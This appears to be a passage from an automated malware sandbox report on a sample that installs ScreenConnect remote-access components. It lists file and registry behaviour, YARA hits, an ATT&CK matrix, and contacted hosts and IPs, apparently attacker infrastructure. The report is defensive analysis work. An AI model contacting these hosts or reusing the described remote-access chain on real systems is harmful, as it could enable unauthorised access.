                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00621807
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.510000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.3054816957.000001D2D980A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1871815455.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.3043338622.000001D2BF15F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 8124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5580, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7636, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter                  		1
                  DLL Search Order Hijacking                  		1
                  DLL Search Order Hijacking                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Windows Service                  		1
                  Windows Service                  		1
                  Install Root Certificate                  		Security Account Manager14
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Timestomp                  		NTDS41
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit                  		1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSHKeylogging3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking                  		Cached Domain Credentials41
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638477 Sample: SecuriteInfo.com.W32.Lolbas... Startdate: 14/03/2025 Architecture: WINDOWS Score: 51 35 www.qmhelp.top 2->35 37 miledin.mwhelp.site 2->37 39 bg.microsoft.map.fastly.net 2->39 45 Multi AV Scanner detection for submitted file 2->45 47 .NET source code references suspicious native API functions 2->47 49 Detected potential unwanted application 2->49 51 Contains functionality to hide user accounts 2->51 10 SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe 2 2->10         started        signatures3 process4 process5 12 dfsvc.exe 130 106 10->12         started        16 WerFault.exe 10->16         started        dnsIp6 43 www.qmhelp.top 172.67.181.28, 443, 49722, 49725 CLOUDFLARENETUS United States 12->43 27 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 12->27 dropped 29 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 12->29 dropped 31 ScreenConnect.WindowsBackstageShell.exe, PE32 12->31 dropped 33 13 other files (none is malicious) 12->33 dropped 18 ScreenConnect.WindowsClient.exe 19 12 12->18         started        file7 process8 dnsIp9 41 miledin.mwhelp.site 62.182.86.171, 63082, 8880 YANINA-ASUA Ukraine 18->41 53 Contains functionality to hide user accounts 18->53 22 ScreenConnect.ClientService.exe 2 2 18->22         started        signatures10 process11 signatures12 55 Contains functionality to hide user accounts 22->55 57 Reads the Security eventlog 22->57 59 Reads the System eventlog 22->59 25 WerFault.exe 21 16 22->25         started        process13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.